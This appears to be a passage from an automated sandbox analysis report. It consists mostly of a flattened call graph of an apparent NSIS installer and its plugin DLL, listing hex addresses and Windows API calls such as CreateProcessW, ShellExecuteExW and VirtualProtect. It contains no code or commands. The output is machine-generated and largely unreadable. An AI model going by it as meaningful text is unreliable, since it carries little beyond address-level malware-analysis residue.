GlobalFree 4814->4815 4816 4038d3 4814->4816 4815->4815 4815->4816 4816->4776 4817 401573 4818 401583 ShowWindow 4817->4818 4819 40158c 4817->4819 4818->4819 4820 40159a ShowWindow 4819->4820 4821 402abf 4819->4821 4820->4821 5261 4014f5 SetForegroundWindow 5262 402abf 5261->5262 5263 100016b6 5264 100016e5 5263->5264 5265 10001b18 22 API calls 5264->5265 5266 100016ec 5265->5266 5267 100016f3 5266->5267 5268 100016ff 5266->5268 5271 10001272 2 API calls 5267->5271 5269 10001726 5268->5269 5270 10001709 5268->5270 5273 10001750 5269->5273 5274 1000172c 5269->5274 5272 1000153d 3 API calls 5270->5272 5275 100016fd 5271->5275 5276 1000170e 5272->5276 5278 1000153d 3 API calls 5273->5278 5277 100015b4 3 API calls 5274->5277 5279 100015b4 3 API calls 5276->5279 5280 10001731 5277->5280 5278->5275 5281 10001714 5279->5281 5282 10001272 2 API calls 5280->5282 5283 10001272 2 API calls 5281->5283 5284 10001737 GlobalFree 5282->5284 5285 1000171a GlobalFree 5283->5285 5284->5275 5286 1000174b GlobalFree 5284->5286 5285->5275 5286->5275 5287 401e77 5288 402c37 17 API calls 5287->5288 5289 401e7d 5288->5289 5290 402c37 17 API calls 5289->5290 5291 401e86 5290->5291 5292 402c37 17 API calls 5291->5292 5293 401e8f 5292->5293 5294 402c37 17 API calls 5293->5294 5295 401e98 5294->5295 5296 401423 24 API calls 5295->5296 5297 401e9f 5296->5297 5304 4058aa ShellExecuteExW 5297->5304 5299 401ee1 5300 40670d 5 API calls 5299->5300 5302 402885 5299->5302 5301 401efb CloseHandle 5300->5301 5301->5302 5304->5299 5305 10002238 5306 10002296 5305->5306 5307 100022cc 5305->5307 5306->5307 5308 100022a8 GlobalAlloc 5306->5308 5308->5306 4829 40167b 4830 402c37 17 API calls 4829->4830 4831 401682 4830->4831 4832 402c37 17 API calls 4831->4832 4833 40168b 4832->4833 4834 402c37 17 API calls 4833->4834 4835 401694 MoveFileW 4834->4835 4836 4016a0 4835->4836 4837 4016a7 4835->4837 4838 401423 24 API calls 4836->4838 4839 4065c5 2 API calls 4837->4839 4841 40224a 4837->4841 4838->4841 4840 4016b6 4839->4840 4840->4841 4842 406048 36 API calls 4840->4842 4842->4836 5309 1000103d 5310 1000101b 5 API calls 5309->5310 5311 10001056 5310->5311 4843 4020fe 4844 402c37 17 API calls 4843->4844 4845 402105 4844->4845 4846 402c37 17 API calls 4845->4846 4847 40210f 4846->4847 4848 402c37 17 API calls 4847->4848 4849 402119 4848->4849 4850 402c37 17 API calls 4849->4850 4851 402123 4850->4851 4852 402c37 17 API calls 4851->4852 4853 40212d 4852->4853 4854 40216c CoCreateInstance 4853->4854 4855 402c37 17 API calls 4853->4855 4858 40218b 4854->4858 4855->4854 4856 401423 24 API calls 4857 40224a 4856->4857 4858->4856 4858->4857 4859 40247e 4860 402c77 17 API calls 4859->4860 4861 402488 4860->4861 4862 402c37 17 API calls 4861->4862 4863 402491 4862->4863 4864 40249c RegQueryValueExW 4863->4864 4867 402885 4863->4867 4865 4024c2 RegCloseKey 4864->4865 4866 4024bc 4864->4866 4865->4867 4866->4865 4870 4061c9 wsprintfW 4866->4870 4870->4865 5312 4019ff 5313 402c37 17 API calls 5312->5313 5314 401a06 5313->5314 5315 402c37 17 API calls 5314->5315 5316 401a0f 5315->5316 5317 401a16 lstrcmpiW 5316->5317 5318 401a28 lstrcmpW 5316->5318 5319 401a1c 5317->5319 5318->5319 3806 401f00 3821 402c37 3806->3821 3815 401f2b 3817 401f30 3815->3817 3818 401f3b 3815->3818 3816 402885 3846 4061c9 wsprintfW 3817->3846 3820 401f39 CloseHandle 3818->3820 3820->3816 3822 402c43 3821->3822 3847 4062a4 3822->3847 3825 401f06 3827 4052e6 3825->3827 3828 405301 3827->3828 3836 401f10 3827->3836 3829 40531d lstrlenW 3828->3829 3832 4062a4 17 API calls 3828->3832 3830 405346 3829->3830 3831 40532b lstrlenW 3829->3831 3834 405359 3830->3834 3835 40534c SetWindowTextW 3830->3835 3833 40533d lstrcatW 3831->3833 3831->3836 3832->3829 3833->3830 3834->3836 3837 40535f SendMessageW SendMessageW SendMessageW 3834->3837 3835->3834 3838 405867 CreateProcessW 3836->3838 3837->3836 3839 401f16 3838->3839 3840 40589a CloseHandle 3838->3840 3839->3816 3839->3820 3841 40670d WaitForSingleObject 3839->3841 3840->3839 3842 406727 3841->3842 3843 406739 GetExitCodeProcess 3842->3843 3889 406698 3842->3889 3843->3815 3846->3820 3848 4062b1 3847->3848 3849 4064fc 3848->3849 3852 4064ca lstrlenW 3848->3852 3855 4062a4 10 API calls 3848->3855 3857 4063df GetSystemDirectoryW 3848->3857 3858 4063f2 GetWindowsDirectoryW 3848->3858 3859 406516 5 API calls 3848->3859 3860 406426 SHGetSpecialFolderLocation 3848->3860 3861 4062a4 10 API calls 3848->3861 3862 40646d lstrcatW 3848->3862 3873 406150 3848->3873 3878 4061c9 wsprintfW 3848->3878 3879 406282 lstrcpynW 3848->3879 3850 402c64 3849->3850 3880 406282 lstrcpynW 3849->3880 3850->3825 3864 406516 3850->3864 3852->3848 3855->3852 3857->3848 3858->3848 3859->3848 3860->3848 3863 40643e SHGetPathFromIDListW CoTaskMemFree 3860->3863 3861->3848 3862->3848 3863->3848 3871 406523 3864->3871 3865 406599 3866 40659e CharPrevW 3865->3866 3868 4065bf 3865->3868 3866->3865 3867 40658c CharNextW 3867->3865 3867->3871 3868->3825 3870 406578 CharNextW 3870->3871 3871->3865 3871->3867 3871->3870 3872 406587 CharNextW 3871->3872 3885 405b80 3871->3885 3872->3867 3881 4060ef 3873->3881 3876 406184 RegQueryValueExW RegCloseKey 3877 4061b4 3876->3877 3877->3848 3878->3848 3879->3848 3880->3850 3882 4060fe 3881->3882 3883 406102 3882->3883 3884 406107 RegOpenKeyExW 3882->3884 3883->3876 3883->3877 3884->3883 3886 405b86 3885->3886 3887 405b9c 3886->3887 3888 405b8d CharNextW 3886->3888 3887->3871 3888->3886 3890 4066b5 PeekMessageW 3889->3890 3891 4066c5 WaitForSingleObject 3890->3891 3892 4066ab DispatchMessageW 3890->3892 3891->3842 3892->3890 5320 401000 5321 401037 BeginPaint GetClientRect 5320->5321 5322 40100c DefWindowProcW 5320->5322 5324 4010f3 5321->5324 5327 401179 5322->5327 5325 401073 CreateBrushIndirect FillRect DeleteObject 5324->5325 5326 4010fc 5324->5326 5325->5324 5328 401102 CreateFontIndirectW 5326->5328 5329 401167 EndPaint 5326->5329 5328->5329 5330 401112 6 API calls 5328->5330 5329->5327 5330->5329 4067 100027c2 4068 10002812 4067->4068 4069 100027d2 VirtualProtect 4067->4069 4069->4068 5331 401503 5332 40150b 5331->5332 5334 40151e 5331->5334 5333 402c15 17 API calls 5332->5333 5333->5334 4081 402306 4082 40230e 4081->4082 4085 402314 4081->4085 4083 402c37 17 API calls 4082->4083 4083->4085 4084 402322 4087 402330 4084->4087 4088 402c37 17 API calls 4084->4088 4085->4084 4086 402c37 17 API calls 4085->4086 4086->4084 4089 402c37 17 API calls 4087->4089 4088->4087 4090 402339 WritePrivateProfileStringW 4089->4090 5335 401f86 5336 402c37 17 API calls 5335->5336 5337 401f8d 5336->5337 5338 40665c 5 API calls 5337->5338 5339 401f9c 5338->5339 5340 401fb8 GlobalAlloc 5339->5340 5341 402020 5339->5341 5340->5341 5342 401fcc 5340->5342 5343 40665c 5 API calls 5342->5343 5344 401fd3 5343->5344 5345 40665c 5 API calls 5344->5345 5346 401fdd 5345->5346 5346->5341 5350 4061c9 wsprintfW 5346->5350 5348 402012 5351 4061c9 wsprintfW 5348->5351 5350->5348 5351->5341 4098 402388 4099 402390 4098->4099 4100 4023bb 4098->4100 4110 402c77 4099->4110 4102 402c37 17 API calls 4100->4102 4104 4023c2 4102->4104 4115 402cf5 4104->4115 4105 4023a1 4107 402c37 17 API calls 4105->4107 4108 4023a8 RegDeleteValueW RegCloseKey 4107->4108 4109 4023cf 4108->4109 4111 402c37 17 API calls 4110->4111 4112 402c8e 4111->4112 4113 4060ef RegOpenKeyExW 4112->4113 4114 402397 4113->4114 4114->4105 4114->4109 4116 402d0b 4115->4116 4117 402d21 4116->4117 4119 402d2a 4116->4119 4117->4109 4120 4060ef RegOpenKeyExW 4119->4120 4121 402d58 4120->4121 4122 402dd0 4121->4122 4129 402d5c 4121->4129 4122->4117 4123 402d7e RegEnumKeyW 4124 402d95 RegCloseKey 4123->4124 4123->4129 4126 40665c 5 API calls 4124->4126 4125 402db6 RegCloseKey 4125->4122 4128 402da5 4126->4128 4127 402d2a 6 API calls 4127->4129 4130 402dc4 RegDeleteKeyW 4128->4130 4131 402da9 4128->4131 4129->4123 4129->4124 4129->4125 4129->4127 4130->4122 4131->4122 5352 40190c 5353 401943 5352->5353 5354 402c37 17 API calls 5353->5354 5355 401948 5354->5355 5356 405990 67 API calls 5355->5356 5357 401951 5356->5357 5358 401d0e 5359 402c15 17 API calls 5358->5359 5360 401d15 5359->5360 5361 402c15 17 API calls 5360->5361 5362 401d21 GetDlgItem 5361->5362 5363 40258c 5362->5363 5364 1000164f 5365 10001516 GlobalFree 5364->5365 5367 10001667 5365->5367 5366 100016ad GlobalFree 5367->5366 5368 10001682 5367->5368 5369 10001699 VirtualFree 5367->5369 5368->5366 5369->5366 5370 40190f 5371 402c37 17 API calls 5370->5371 5372 401916 5371->5372 5373 4058e4 MessageBoxIndirectW 5372->5373 5374 40191f 5373->5374 5375 401491 5376 4052e6 24 API calls 5375->5376 5377 401498 5376->5377 5378 402592 5379 4025c1 5378->5379 5380 4025a6 5378->5380 5382 4025f5 5379->5382 5383 4025c6 5379->5383 5381 402c15 17 API calls 5380->5381 5388 4025ad 5381->5388 5384 402c37 17 API calls 5382->5384 5385 402c37 17 API calls 5383->5385 5386 4025fc lstrlenW 5384->5386 5387 4025cd WideCharToMultiByte lstrlenA 5385->5387 5386->5388 5387->5388 5390 405e55 5 API calls 5388->5390 5391 40263f 5388->5391 5392 402629 5388->5392 5389 405e26 WriteFile 5389->5391 5390->5392 5392->5389 5392->5391 5393 10001058 5395 10001074 5393->5395 5394 100010dd 5395->5394 5396 10001516 GlobalFree 5395->5396 5397 10001092 5395->5397 5396->5397 5398 10001516 GlobalFree 5397->5398 5399 100010a2 5398->5399 5400 100010b2 5399->5400 5401 100010a9 GlobalSize 5399->5401 5402 100010b6 GlobalAlloc 5400->5402 5403 100010c7 5400->5403 5401->5400 5404 1000153d 3 API calls 5402->5404 5405 100010d2 GlobalFree 5403->5405 5404->5403 5405->5394 4155 401c19 4156 402c15 17 API calls 4155->4156 4157 401c20 4156->4157 4158 402c15 17 API calls 4157->4158 4159 401c2d 4158->4159 4160 401c42 4159->4160 4161 402c37 17 API calls 4159->4161 4162 401c52 4160->4162 4165 402c37 17 API calls 4160->4165 4161->4160 4163 401ca9 4162->4163 4164 401c5d 4162->4164 4167 402c37 17 API calls 4163->4167 4166 402c15 17 API calls 4164->4166 4165->4162 4168 401c62 4166->4168 4169 401cae 4167->4169 4170 402c15 17 API calls 4168->4170 4171 402c37 17 API calls 4169->4171 4172 401c6e 4170->4172 4173 401cb7 FindWindowExW 4171->4173 4174 401c99 SendMessageW 4172->4174 4175 401c7b SendMessageTimeoutW 4172->4175 4176 401cd9 4173->4176 4174->4176 4175->4176 5406 402a9a SendMessageW 5407 402ab4 InvalidateRect 5406->5407 5408 402abf 5406->5408 5407->5408 5409 40281b 5410 402821 5409->5410 5411 402829 FindClose 5410->5411 5412 402abf 5410->5412 5411->5412 5413 40149e 5414 4022f1 5413->5414 5415 4014ac PostQuitMessage 5413->5415 5415->5414 5416 40469f 5417 4046d5 5416->5417 5418 4046af 5416->5418 5420 40427e 8 API calls 5417->5420 5419 404217 18 API calls 5418->5419 5421 4046bc SetDlgItemTextW 5419->5421 5422 4046e1 5420->5422 5421->5417 5423 100010e1 5424 10001111 5423->5424 5425 100011d8 GlobalFree 5424->5425 5426 100012ba 2 API calls 5424->5426 5427 100011d3 5424->5427 5428 10001272 2 API calls 5424->5428 5429 10001164 GlobalAlloc 5424->5429 5430 100011f8 GlobalFree 5424->5430 5431 100012e1 lstrcpyW 5424->5431 5432 100011c4 GlobalFree 5424->5432 5426->5424 5427->5425 5428->5432 5429->5424 5430->5424 5431->5424 5432->5424 5433 4015a3 5434 402c37 17 API calls 5433->5434 5435 4015aa SetFileAttributesW 5434->5435 5436 4015bc 5435->5436 4246 405425 4247 405446 GetDlgItem GetDlgItem GetDlgItem 4246->4247 4248 4055cf 4246->4248 4292 40424c SendMessageW 4247->4292 4250 405600 4248->4250 4251 4055d8 GetDlgItem CreateThread CloseHandle 4248->4251 4252 40562b 4250->4252 4253 405650 4250->4253 4254 405617 ShowWindow ShowWindow 4250->4254 4251->4250 4315 4053b9 OleInitialize 4251->4315 4255 405637 4252->4255 4262 40568b 4252->4262 4301 40427e 4253->4301 4297 40424c SendMessageW 4254->4297 4258 405665 ShowWindow 4255->4258 4259 40563f 4255->4259 4256 4054b6 4261 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 4256->4261 4266 405685 4258->4266 4267 405677 4258->4267 4298 4041f0 4259->4298 4268 40552b 4261->4268 4269 40550f SendMessageW SendMessageW 4261->4269 4262->4253 4263 405699 SendMessageW 4262->4263 4265 40565e 4263->4265 4270 4056b2 CreatePopupMenu 4263->4270 4274 4041f0 SendMessageW 4266->4274 4273 4052e6 24 API calls 4267->4273 4271 405530 SendMessageW 4268->4271 4272 40553e 4268->4272 4269->4268 4275 4062a4 17 API calls 4270->4275 4271->4272 4293 404217 4272->4293 4273->4266 4274->4262 4277 4056c2 AppendMenuW 4275->4277 4279 4056f2 TrackPopupMenu 4277->4279 4280 4056df GetWindowRect 4277->4280 4278 40554e 4281 405557 ShowWindow 4278->4281 4282 40558b GetDlgItem SendMessageW 4278->4282 4279->4265 4283 40570d 4279->4283 4280->4279 4284 40556d ShowWindow 4281->4284 4287 40557a 4281->4287 4282->4265 4285 4055b2 SendMessageW SendMessageW 4282->4285 4286 405729 SendMessageW 4283->4286 4284->4287 4285->4265 4286->4286 4288 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4286->4288 4296 40424c SendMessageW 4287->4296 4290 40576b SendMessageW 4288->4290 4290->4290 4291 405794 GlobalUnlock SetClipboardData CloseClipboard 4290->4291 4291->4265 4292->4256 4294 4062a4 17 API calls 4293->4294 4295 404222 SetDlgItemTextW 4294->4295 4295->4278 4296->4282 4297->4252 4299 4041f7 4298->4299 4300 4041fd SendMessageW 4298->4300 4299->4300 4300->4253 4302 404296 GetWindowLongW 4301->4302 4303 40431f 4301->4303 4302->4303 4304 4042a7 4302->4304 4303->4265 4305 4042b6 GetSysColor 4304->4305 4306 4042b9 4304->4306 4305->4306 4307 4042c9 SetBkMode 4306->4307 4308 4042bf SetTextColor 4306->4308 4309 4042e1 GetSysColor 4307->4309 4310 4042e7 4307->4310 4308->4307 4309->4310 4311 4042f8 4310->4311 4312 4042ee SetBkColor 4310->4312 4311->4303 4313 404312 CreateBrushIndirect 4311->4313 4314 40430b DeleteObject 4311->4314 4312->4311 4313->4303 4314->4313 4322 404263 4315->4322 4317 4053dc 4321 405403 4317->4321 4325 401389 4317->4325 4318 404263 SendMessageW 4319 405415 OleUninitialize 4318->4319 4321->4318 4323 40427b 4322->4323 4324 40426c SendMessageW 4322->4324 4323->4317 4324->4323 4327 401390 4325->4327 4326 4013fe 4326->4317 4327->4326 4328 4013cb MulDiv SendMessageW 4327->4328 4328->4327 5437 4028a7 5438 402c37 17 API calls 5437->5438 5439 4028b5 5438->5439 5440 4028cb 5439->5440 5441 402c37 17 API calls 5439->5441 5442 405d4f 2 API calls 5440->5442 5441->5440 5443 4028d1 5442->5443 5465 405d74 GetFileAttributesW CreateFileW 5443->5465 5445 4028de 5446 402981 5445->5446 5447 4028ea GlobalAlloc 5445->5447 5450 402989 DeleteFileW 5446->5450 5451 40299c 5446->5451 5448 402903 5447->5448 5449 402978 CloseHandle 5447->5449 5466 40332b SetFilePointer 5448->5466 5449->5446 5450->5451 5453 402909 5454 403315 ReadFile 5453->5454 5455 402912 GlobalAlloc 5454->5455 5456 402922 5455->5456 5457 402956 5455->5457 5459 4030fa 31 API calls 5456->5459 5458 405e26 WriteFile 5457->5458 5460 402962 GlobalFree 5458->5460 5464 40292f 5459->5464 5461 4030fa 31 API calls 5460->5461 5463 402975 5461->5463 5462 40294d GlobalFree 5462->5457 5463->5449 5464->5462 5465->5445 5466->5453 4329 4058aa ShellExecuteExW 5467 40432b lstrcpynW lstrlenW 4330 40202c 4331 40203e 4330->4331 4341 4020f0 4330->4341 4332 402c37 17 API calls 4331->4332 4334 402045 4332->4334 4333 401423 24 API calls 4337 40224a 4333->4337 4335 402c37 17 API calls 4334->4335 4336 40204e 4335->4336 4338 402064 LoadLibraryExW 4336->4338 4339 402056 GetModuleHandleW 4336->4339 4340 402075 4338->4340 4338->4341 4339->4338 4339->4340 4353 4066cb WideCharToMultiByte 4340->4353 4341->4333 4344 402086 4347 4020a5 4344->4347 4348 40208e 4344->4348 4345 4020bf 4346 4052e6 24 API calls 4345->4346 4349 402096 4346->4349 4356 10001759 4347->4356 4350 401423 24 API calls 4348->4350 4349->4337 4351 4020e2 FreeLibrary 4349->4351 4350->4349 4351->4337 4354 4066f5 GetProcAddress 4353->4354 4355 402080 4353->4355 4354->4355 4355->4344 4355->4345 4357 10001789 4356->4357 4398 10001b18 4357->4398 4359 10001790 4360 100018a6 4359->4360 4361 100017a1 4359->4361 4362 100017a8 4359->4362 4360->4349 4446 10002286 4361->4446 4430 100022d0 4362->4430 4367 100017d7 4382 100017cd 4367->4382 4456 10002b57 4367->4456 4368 100017be 4372 100017c4 4368->4372 4376 100017cf 4368->4376 4369 1000180c 4373 10001812 4369->4373 4374 1000184e 4369->4374 4370 100017ee 4459 100024a4 4370->4459 4372->4382 4440 1000289c 4372->4440 4378 100015b4 3 API calls 4373->4378 4380 100024a4 10 API calls 4374->4380 4375 100017f4 4470 100015b4 4375->4470 4450 10002640 4376->4450 4384 10001828 4378->4384 4385 10001840 4380->4385 4382->4369 4382->4370 4388 100024a4 10 API calls 4384->4388 4397 10001895 4385->4397 4481 10002467 4385->4481 4387 100017d5 4387->4382 4388->4385 4392 1000189f GlobalFree 4392->4360 4393 10001881 4393->4397 4485 1000153d wsprintfW 4393->4485 4395 1000187a FreeLibrary 4395->4393 4397->4360 4397->4392 4488 1000121b GlobalAlloc 4398->4488 4400 10001b3c 4489 1000121b GlobalAlloc 4400->4489 4402 10001d7a GlobalFree GlobalFree GlobalFree 4403 10001d97 4402->4403 4420 10001de1 4402->4420 4404 100020ee 4403->4404 4412 10001dac 4403->4412 4403->4420 4406 10002110 GetModuleHandleW 4404->4406 4404->4420 4405 10001c1d GlobalAlloc 4425 10001b47 4405->4425 4408 10002121 LoadLibraryW 4406->4408 4409 10002136 4406->4409 4407 10001c86 GlobalFree 4407->4425 4408->4409 4408->4420 4496 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4409->4496 4410 10001c68 lstrcpyW 4413 10001c72 lstrcpyW 4410->4413 4412->4420 4492 1000122c 4412->4492 4413->4425 4414 10002188 4415 10002195 lstrlenW 4414->4415 4414->4420 4497 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4415->4497 4417 10002048 4417->4420 4422 10002090 lstrcpyW 4417->4422 4420->4359 4421 10002148 4421->4414 4429 10002172 GetProcAddress 4421->4429 4422->4420 4423 10001cc4 4423->4425 4490 1000158f GlobalSize GlobalAlloc 4423->4490 4424 10001f37 GlobalFree 4424->4425 4425->4402 4425->4405 4425->4407 4425->4410 4425->4413 4425->4417 4425->4420 4425->4423 4425->4424 4428 1000122c 2 API calls 4425->4428 4495 1000121b GlobalAlloc 4425->4495 4426 100021af 4426->4420 4428->4425 4429->4414 4437 100022e8 4430->4437 4432 10002410 GlobalFree 4435 100017ae 4432->4435 4432->4437 4433 100023ba GlobalAlloc CLSIDFromString 4433->4432 4434 1000238f GlobalAlloc WideCharToMultiByte 4434->4432 4435->4367 4435->4368 4435->4382 4436 1000122c GlobalAlloc lstrcpynW 4436->4437 4437->4432 4437->4433 4437->4434 4437->4436 4439 100023d9 4437->4439 4499 100012ba 4437->4499 4439->4432 4503 100025d4 4439->4503 4441 100028ae 4440->4441 4442 10002953 CreateFileA 4441->4442 4443 10002971 4442->4443 4444 10002a62 GetLastError 4443->4444 4445 10002a6d 4443->4445 4444->4445 4445->4382 4447 10002296 4446->4447 4448 100017a7 4446->4448 4447->4448 4449 100022a8 GlobalAlloc 4447->4449 4448->4362 4449->4447 4454 1000265c 4450->4454 4451 100026c0 4453 100026c5 GlobalSize 4451->4453 4455 100026cf 4451->4455 4452 100026ad GlobalAlloc 4452->4455 4453->4455 4454->4451 4454->4452 4455->4387 4458 10002b62 4456->4458 4457 10002ba2 GlobalFree 4458->4457 4506 1000121b GlobalAlloc 4459->4506 4461 10002506 MultiByteToWideChar 4465 100024ae 4461->4465 4462 1000252b StringFromGUID2 4462->4465 4463 1000253c lstrcpynW 4463->4465 4464 1000254f wsprintfW 4464->4465 4465->4461 4465->4462 4465->4463 4465->4464 4466 1000256c GlobalFree 4465->4466 4467 100025a7 GlobalFree 4465->4467 4468 10001272 2 API calls 4465->4468 4507 100012e1 4465->4507 4466->4465 4467->4375 4468->4465 4511 1000121b GlobalAlloc 4470->4511 4472 100015ba 4474 100015e1 4472->4474 4475 100015c7 lstrcpyW 4472->4475 4476 100015fb 4474->4476 4477 100015e6 wsprintfW 4474->4477 4475->4476 4478 10001272 4476->4478 4477->4476 4479 100012b5 GlobalFree 4478->4479 4480 1000127b GlobalAlloc lstrcpynW 4478->4480 4479->4385 4480->4479 4482 10002475 4481->4482 4484 10001861 4481->4484 4483 10002491 GlobalFree 4482->4483 4482->4484 4483->4482 4484->4393 4484->4395 4486 10001272 2 API calls 4485->4486 4487 1000155e 4486->4487 4487->4397 4488->4400 4489->4425 4491 100015ad 4490->4491 4491->4423 4498 1000121b GlobalAlloc 4492->4498 4494 1000123b lstrcpynW 4494->4420 4495->4425 4496->4421 4497->4426 4498->4494 4500 100012c1 4499->4500 4501 1000122c 2 API calls 4500->4501 4502 100012df 4501->4502 4502->4437 4504 100025e2 VirtualAlloc 4503->4504 4505 10002638 4503->4505 4504->4505 4505->4439 4506->4465 4508 100012ea 4507->4508 4509 1000130c 4507->4509 4508->4509 4510 100012f0 lstrcpyW 4508->4510 4509->4465 4510->4509 4511->4472 5468 402a2f 5469 402c15 17 API calls 5468->5469 5470 402a35 5469->5470 5471 402a6c 5470->5471 5473 402885 5470->5473 5474 402a47 5470->5474 5472 4062a4 17 API calls 5471->5472 5471->5473 5472->5473 5474->5473 5476 4061c9 wsprintfW 5474->5476 5476->5473 5477 401a30 5478 402c37 17 API calls 5477->5478 5479 401a39 ExpandEnvironmentStringsW 5478->5479 5480 401a4d 5479->5480 5482 401a60 5479->5482 5481 401a52 lstrcmpW 5480->5481 5480->5482 5481->5482 5488 401db3 GetDC 5489 402c15 17 API calls 5488->5489 5490 401dc5 GetDeviceCaps MulDiv ReleaseDC 5489->5490 5491 402c15 17 API calls 5490->5491 5492 401df6 5491->5492 5493 4062a4 17 API calls 5492->5493 5494 401e33 CreateFontIndirectW 5493->5494 5495 40258c 5494->5495 5496 4043b4 5497 4044e6 5496->5497 5499 4043cc 5496->5499 5498 404550 5497->5498 5500 40461a 5497->5500 5505 404521 GetDlgItem SendMessageW 5497->5505 5498->5500 5501 40455a GetDlgItem 5498->5501 5502 404217 18 API calls 5499->5502 5507 40427e 8 API calls 5500->5507 5503 404574 5501->5503 5504 4045db 5501->5504 5506 404433 5502->5506 5503->5504 5512 40459a SendMessageW LoadCursorW SetCursor 5503->5512 5504->5500 5508 4045ed 5504->5508 5529 404239 KiUserCallbackDispatcher 5505->5529 5510 404217 18 API calls 5506->5510 5511 404615 5507->5511 5514 404603 5508->5514 5515 4045f3 SendMessageW 5508->5515 5517 404440 CheckDlgButton 5510->5517 5530 404663 5512->5530 5514->5511 5519 404609 SendMessageW 5514->5519 5515->5514 5516 40454b 5520 40463f SendMessageW 5516->5520 5527 404239 KiUserCallbackDispatcher 5517->5527 5519->5511 5520->5498 5522 40445e GetDlgItem 5528 40424c SendMessageW 5522->5528 5524 404474 SendMessageW 5525 404491 GetSysColor 5524->5525 5526 40449a SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5524->5526 5525->5526 5526->5511 5527->5522 5528->5524 5529->5516 5533 4058aa ShellExecuteExW 5530->5533 5532 4045c9 LoadCursorW SetCursor 5532->5504 5533->5532 4822 401735 4823 402c37 17 API calls 4822->4823 4824 40173c SearchPathW 4823->4824 4825 4029e0 4824->4825 4826 401757 4824->4826 4826->4825 4828 406282 lstrcpynW 4826->4828 4828->4825 5534 402835 5535 40283d 5534->5535 5536 402841 FindNextFileW 5535->5536 5537 402853 5535->5537 5536->5537 5539 4029e0 5537->5539 5540 406282 lstrcpynW 5537->5540 5540->5539 5541 10002a77 5542 10002a8f 5541->5542 5543 1000158f 2 API calls 5542->5543 5544 10002aaa 5543->5544 5545 4014b8 5546 4014be 5545->5546 5547 401389 2 API calls 5546->5547 5548 4014c6 5547->5548 5549 404a3c 5550 404a68 5549->5550 5551 404a4c 5549->5551 5553 404a9b 5550->5553 5554 404a6e SHGetPathFromIDListW 5550->5554 5560 4058c8 GetDlgItemTextW 5551->5560 5556 404a85 SendMessageW 5554->5556 5557 404a7e 5554->5557 5555 404a59 SendMessageW 5555->5550 5556->5553 5558 40140b 2 API calls 5557->5558 5558->5556 5560->5555 4871 403d3e 4872 403e91 4871->4872 4873 403d56 4871->4873 4875 403ea2 GetDlgItem GetDlgItem 4872->4875 4876 403ee2 4872->4876 4873->4872 4874 403d62 4873->4874 4877 403d80 4874->4877 4878 403d6d SetWindowPos 4874->4878 4879 404217 18 API calls 4875->4879 4880 403f3c 4876->4880 4889 401389 2 API calls 4876->4889 4882 403d85 ShowWindow 4877->4882 4883 403d9d 4877->4883 4878->4877 4884 403ecc SetClassLongW 4879->4884 4881 404263 SendMessageW 4880->4881 4885 403e8c 4880->4885 4912 403f4e 4881->4912 4882->4883 4886 403da5 DestroyWindow 4883->4886 4887 403dbf 4883->4887 4888 40140b 2 API calls 4884->4888 4890 4041a0 4886->4890 4891 403dc4 SetWindowLongW 4887->4891 4892 403dd5 4887->4892 4888->4876 4893 403f14 4889->4893 4890->4885 4900 4041d1 ShowWindow 4890->4900 4891->4885 4896 403de1 GetDlgItem 4892->4896 4897 403e7e 4892->4897 4893->4880 4898 403f18 SendMessageW 4893->4898 4894 40140b 2 API calls 4894->4912 4895 4041a2 DestroyWindow EndDialog 4895->4890 4901 403e11 4896->4901 4902 403df4 SendMessageW IsWindowEnabled 4896->4902 4899 40427e 8 API calls 4897->4899 4898->4885 4899->4885 4900->4885 4904 403e1e 4901->4904 4905 403e65 SendMessageW 4901->4905 4906 403e31 4901->4906 4915 403e16 4901->4915 4902->4885 4902->4901 4903 4062a4 17 API calls 4903->4912 4904->4905 4904->4915 4905->4897 4909 403e39 4906->4909 4910 403e4e 4906->4910 4907 4041f0 SendMessageW 4911 403e4c 4907->4911 4908 404217 18 API calls 4908->4912 4913 40140b 2 API calls 4909->4913 4914 40140b 2 API calls 4910->4914 4911->4897 4912->4885 4912->4894 4912->4895 4912->4903 4912->4908 4917 404217 18 API calls 4912->4917 4933 4040e2 DestroyWindow 4912->4933 4913->4915 4916 403e55 4914->4916 4915->4907 4916->4897 4916->4915 4918 403fc9 GetDlgItem 4917->4918 4919 403fe6 ShowWindow KiUserCallbackDispatcher 4918->4919 4920 403fde 4918->4920 4942 404239 KiUserCallbackDispatcher 4919->4942 4920->4919 4922 404010 EnableWindow 4927 404024 4922->4927 4923 404029 GetSystemMenu EnableMenuItem SendMessageW 4924 404059 SendMessageW 4923->4924 4923->4927 4924->4927 4926 403d1f 18 API calls 4926->4927 4927->4923 4927->4926 4943 40424c SendMessageW 4927->4943 4944 406282 lstrcpynW 4927->4944 4929 404088 lstrlenW 4930 4062a4 17 API calls 4929->4930 4931 40409e SetWindowTextW 4930->4931 4932 401389 2 API calls 4931->4932 4932->4912 4933->4890 4934 4040fc CreateDialogParamW 4933->4934 4934->4890 4935 40412f 4934->4935 4936 404217 18 API calls 4935->4936 4937 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4936->4937 4938 401389 2 API calls 4937->4938 4939 404180 4938->4939 4939->4885 4940 404188 ShowWindow 4939->4940 4941 404263 SendMessageW 4940->4941 4941->4890 4942->4922 4943->4927 4944->4929

                                                                                                                                Executed Functions

                                                                                                                                Function 00403373 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 412stringfilecomCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
